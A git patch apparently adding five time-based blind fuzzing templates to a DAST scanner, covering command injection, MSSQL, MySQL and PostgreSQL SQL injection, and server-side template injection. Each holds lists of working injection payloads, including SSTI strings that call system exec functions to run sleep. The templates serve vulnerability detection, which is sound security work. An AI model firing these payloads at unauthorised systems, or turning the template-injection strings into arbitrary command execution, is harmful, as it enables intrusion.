From 6093d8508a061adc33241d20e2aa99f339cbf391 Mon Sep 17 00:00:00 2001 From: Ice3man Date: Wed, 20 Nov 2024 20:31:14 +0530 Subject: [PATCH] feat: added blind time based fuzzing templates using analyzer --- .../cmdi/cmdi-time-based-blind.yaml | 60 +++++++++++++++++++ .../sqli/mssql-time-based-sqli.yaml | 49 +++++++++++++++ .../sqli/mysql-time-based-sqli.yaml | 56 +++++++++++++++++ .../sqli/postgres-time-based-sqli.yaml | 52 ++++++++++++++++ .../vulnerabilities/ssti/ssti-time-based.yaml | 46 ++++++++++++++ 5 files changed, 263 insertions(+) create mode 100644 dast/vulnerabilities/cmdi/cmdi-time-based-blind.yaml create mode 100644 dast/vulnerabilities/sqli/mssql-time-based-sqli.yaml create mode 100644 dast/vulnerabilities/sqli/mysql-time-based-sqli.yaml create mode 100644 dast/vulnerabilities/sqli/postgres-time-based-sqli.yaml create mode 100644 dast/vulnerabilities/ssti/ssti-time-based.yaml diff --git a/dast/vulnerabilities/cmdi/cmdi-time-based-blind.yaml b/dast/vulnerabilities/cmdi/cmdi-time-based-blind.yaml new file mode 100644 index 00000000000..de4aedc9d90 --- /dev/null +++ b/dast/vulnerabilities/cmdi/cmdi-time-based-blind.yaml @@ -0,0 +1,60 @@ +id: command-injection-blind-time-based + +info: + name: Command Injection - Blind Time based + author: pdteam + severity: critical + reference: + - https://github.com/zaproxy/zap-extensions/blob/main/addOns/ascanrules/src/main/java/org/zaproxy/zap/extension/ascanrules/CommandInjectionScanRule.java + +http: + - payloads: + injections: + low: + - "&sleep [SLEEPTIME]&" + - ";sleep [SLEEPTIME];" + - "&timeout /T [SLEEPTIME]" + - "$(sleep [SLEEPTIME])" + - "`sleep [SLEEPTIME]`" + medium: + - "|timeout /T [SLEEPTIME]" + - ";start-sleep -s [SLEEPTIME]" + - "\"&sleep [SLEEPTIME]&\"" + - "\";sleep [SLEEPTIME];\"" + - "\"&timeout /T [SLEEPTIME]&\"" + - "\";start-sleep -s [SLEEPTIME]" + - "'&sleep [SLEEPTIME]&'" + - "';sleep [SLEEPTIME];'" + high: + - "'&timeout /T [SLEEPTIME]&'" + - "'|timeout /T [SLEEPTIME]" + - "';start-sleep -s [SLEEPTIME]" + - "\nsleep [SLEEPTIME]\n" + - "`sleep [SLEEPTIME]`" + - "||sleep [SLEEPTIME]" + - "&&sleep [SLEEPTIME]" + - "\"|timeout /T [SLEEPTIME]" + - "|sleep [SLEEPTIME]#" + - "run timeout /T [SLEEPTIME]" + - ";start-sleep -s [SLEEPTIME] #" + - "&[SLEEPTIME]&" + - ";[SLEEPTIME];" + + attack: pitchfork + analyzer: + name: time_delay + + fuzzing: + - part: request + type: postfix + mode: single + fuzz: + - "{{injections}}" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: analyzer + words: + - "true" \ No newline at end of file diff --git a/dast/vulnerabilities/sqli/mssql-time-based-sqli.yaml b/dast/vulnerabilities/sqli/mssql-time-based-sqli.yaml new file mode 100644 index 00000000000..5462d9de832 --- /dev/null +++ b/dast/vulnerabilities/sqli/mssql-time-based-sqli.yaml @@ -0,0 +1,49 @@ +id: mssql-blind-time-based-sqli + +info: + name: MSSQL SQLi - Blind Time based + author: pdteam + severity: critical + reference: + - https://github.com/zaproxy/zap-extensions/blob/main/addOns/ascanrules/src/main/java/org/zaproxy/zap/extension/ascanrules/SqlInjectionMsSqlScanRule.java + +http: + - payloads: + injections: + low: + - " WAITFOR DELAY '0:0:[SLEEPTIME]' --" + - "' WAITFOR DELAY '0:0:[SLEEPTIME]' --" + - "\" WAITFOR DELAY '0:0:[SLEEPTIME]' --" + medium: + - ") WAITFOR DELAY '0:0:[SLEEPTIME]' --" + - ") ' WAITFOR DELAY '0:0:[SLEEPTIME]' --" + - ") \" WAITFOR DELAY '0:0:[SLEEPTIME]' --" + - ")) WAITFOR DELAY '0:0:[SLEEPTIME]' --" + - ")) ' WAITFOR DELAY '0:0:[SLEEPTIME]' --" + - ")) \" WAITFOR DELAY '0:0:[SLEEPTIME]' --" + high: + - ") WAITFOR DELAY '0:0:[SLEEPTIME]' (" + - ") ' WAITFOR DELAY '0:0:[SLEEPTIME]' (" + - ") \" WAITFOR DELAY '0:0:[SLEEPTIME]' (" + - ")) WAITFOR DELAY '0:0:[SLEEPTIME]' ((" + - ")) ' WAITFOR DELAY '0:0:[SLEEPTIME]' ((" + - ")) \" WAITFOR DELAY '0:0:[SLEEPTIME]' ((" + + attack: pitchfork + analyzer: + name: time_delay + + fuzzing: + - part: request + type: postfix + mode: single + fuzz: + - "{{injections}}" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: analyzer + words: + - "true" \ No newline at end of file diff --git a/dast/vulnerabilities/sqli/mysql-time-based-sqli.yaml b/dast/vulnerabilities/sqli/mysql-time-based-sqli.yaml new file mode 100644 index 00000000000..5f79874e677 --- /dev/null +++ b/dast/vulnerabilities/sqli/mysql-time-based-sqli.yaml @@ -0,0 +1,56 @@ +id: mysql-blind-time-based-sqli + +info: + name: MySQL SQLi - Blind Time based + author: pdteam + severity: critical + reference: + - https://github.com/zaproxy/zap-extensions/blob/main/addOns/ascanrules/src/main/java/org/zaproxy/zap/extension/ascanrules/SqlInjectionMySqlScanRule.java + +http: + # payloads taken from zap + - payloads: + injections: + low: + - " / sleep([SLEEPTIME]) " + - "' / sleep([SLEEPTIME]) / '" + - "\" / sleep([SLEEPTIME]) / \"" + - " and 0 in (select sleep([SLEEPTIME]) ) -- " + - "' and 0 in (select sleep([SLEEPTIME]) ) -- " + - "\" and 0 in (select sleep([SLEEPTIME]) ) -- " + medium: + - " where 0 in (select sleep([SLEEPTIME]) ) -- " + - "' where 0 in (select sleep([SLEEPTIME]) ) -- " + - "\" where 0 in (select sleep([SLEEPTIME]) ) -- " + - " or 0 in (select sleep([SLEEPTIME]) ) -- " + - "' or 0 in (select sleep([SLEEPTIME]) ) -- " + - "\" or 0 in (select sleep([SLEEPTIME]) ) -- " + - " where 0 in (select sleep([SLEEPTIME]) ) " + - "' where 0 in (select sleep([SLEEPTIME]) ) and ''='" + high: + - "\" where 0 in (select sleep([SLEEPTIME]) ) and \"\"=\"" + - " and 0 in (select sleep([SLEEPTIME]) ) " + - "' and 0 in (select sleep([SLEEPTIME]) ) and ''='" + - "\" and 0 in (select sleep([SLEEPTIME]) ) and \"\"=\"" + - " or 0 in (select sleep([SLEEPTIME]) ) " + - "' or 0 in (select sleep([SLEEPTIME]) ) and ''='" + - "\" or 0 in (select sleep([SLEEPTIME]) ) and \"\"=\"" + + attack: pitchfork + analyzer: + name: time_delay + + fuzzing: + - part: request + type: postfix + mode: single + fuzz: + - "{{injections}}" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: analyzer + words: + - "true" \ No newline at end of file diff --git a/dast/vulnerabilities/sqli/postgres-time-based-sqli.yaml b/dast/vulnerabilities/sqli/postgres-time-based-sqli.yaml new file mode 100644 index 00000000000..6e06e997b50 --- /dev/null +++ b/dast/vulnerabilities/sqli/postgres-time-based-sqli.yaml @@ -0,0 +1,52 @@ +id: postgres-sqli-time-based + +info: + name: PostgreSQL Time based SQL Injection + author: pdteam + severity: critical + reference: + - https://github.com/zaproxy/zap-extensions/blob/main/addOns/ascanrules/src/main/java/org/zaproxy/zap/extension/ascanrules/SqlInjectionPostgreScanRule.java + + +http: + - payloads: + injections: + low: + - "case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end" + - "case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end --" + - "' case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end --" + - "\" case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end --" + medium: + - " / case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end " + - "' / case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end / '" + - "\" / case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end / \"" + - " where 0 in (select case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end ) --" + - "' where 0 in (select case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end ) --" + - "\" where 0 in (select case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end ) --" + high: + - " and 0 in (select case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end ) --" + - "' and 0 in (select case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end ) --" + - "\" and 0 in (select case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end ) --" + - " or 0 in (select case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end ) --" + - "' or 0 in (select case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end ) --" + - "\" or 0 in (select case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end ) --" + + attack: pitchfork + + analyzer: + name: time_delay + + fuzzing: + - part: request + type: postfix + mode: single + fuzz: + - "{{injections}}" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: analyzer + words: + - "true" diff --git a/dast/vulnerabilities/ssti/ssti-time-based.yaml b/dast/vulnerabilities/ssti/ssti-time-based.yaml new file mode 100644 index 00000000000..a4173c4844d --- /dev/null +++ b/dast/vulnerabilities/ssti/ssti-time-based.yaml @@ -0,0 +1,46 @@ +id: ssti-blind-time-based + +info: + name: Server Side Template Injection - Blind Time based + author: pdteam + severity: critical + reference: + - https://github.com/zaproxy/zap-extensions/blob/main/addOns/ascanrules/src/main/java/org/zaproxy/zap/extension/ascanrules/SstiBlindScanRule.java + +http: + - payloads: + injections: + low: + - "<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ ex(\"sleep [SLEEPTIME]\") }" # javaFreemarker + - "#set($engine=\"\")\n#set($proc=$engine.getClass().forName(\"java.lang.Runtime\").getRuntime().exec(\"sleep [SLEEPTIME]\"))\n#set($null=$proc.waitFor())\n${null}" # javaVelocity + - "{{= global.process.mainModule.require('child_process').execSync('sleep [SLEEPTIME]').toString() }}" # Javascript dot + - "<%= global.process.mainModule.require('child_process').execSync('sleep [SLEEPTIME]').toString()%>" # Javascript EJS + - "#{global.process.mainModule.require('child_process').execSync('sleep [SLEEPTIME]').toString()}" # Javascript jade + - "{{range.constructor(\"return eval(\\\"global.process.mainModule.require('child_process').execSync('sleep [SLEEPTIME]').toString()\\\")\")()}}" # Javascript Nunjucks + - "{system(\"sleep [SLEEPTIME]\")}" # PHP smarty + - "{{\"\".__class__.__mro__[1].__subclasses__()[157].__repr__.__globals__.get(\"__builtins__\").get(\"__import__\")(\"subprocess\").check_output(\"sleep [SLEEPTIME]\")}}" # python3 jinja2 + - "${__import__(\"subprocess\").check_output(\"sleep [SLEEPTIME]\", shell=True)}" # python Mako + - "{{__import__(\"subprocess\").check_output(\"sleep [SLEEPTIME]\", shell=True)}}" # Python + - "<%=%x(sleep [SLEEPTIME])%>" # Ruby ERB + - "#{%x(sleep [SLEEPTIME])}" # Ruby Slims + - "{{_self.env.registerUndefinedFilterCallback('exec')}}{{_self.env.getFilter('sleep [SLEEPTIME]')}}" + + skip-variables-check: true + attack: pitchfork + analyzer: + name: time_delay + + fuzzing: + - part: request + type: postfix + mode: single + fuzz: + - "{{injections}}" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: analyzer + words: + - "true" \ No newline at end of file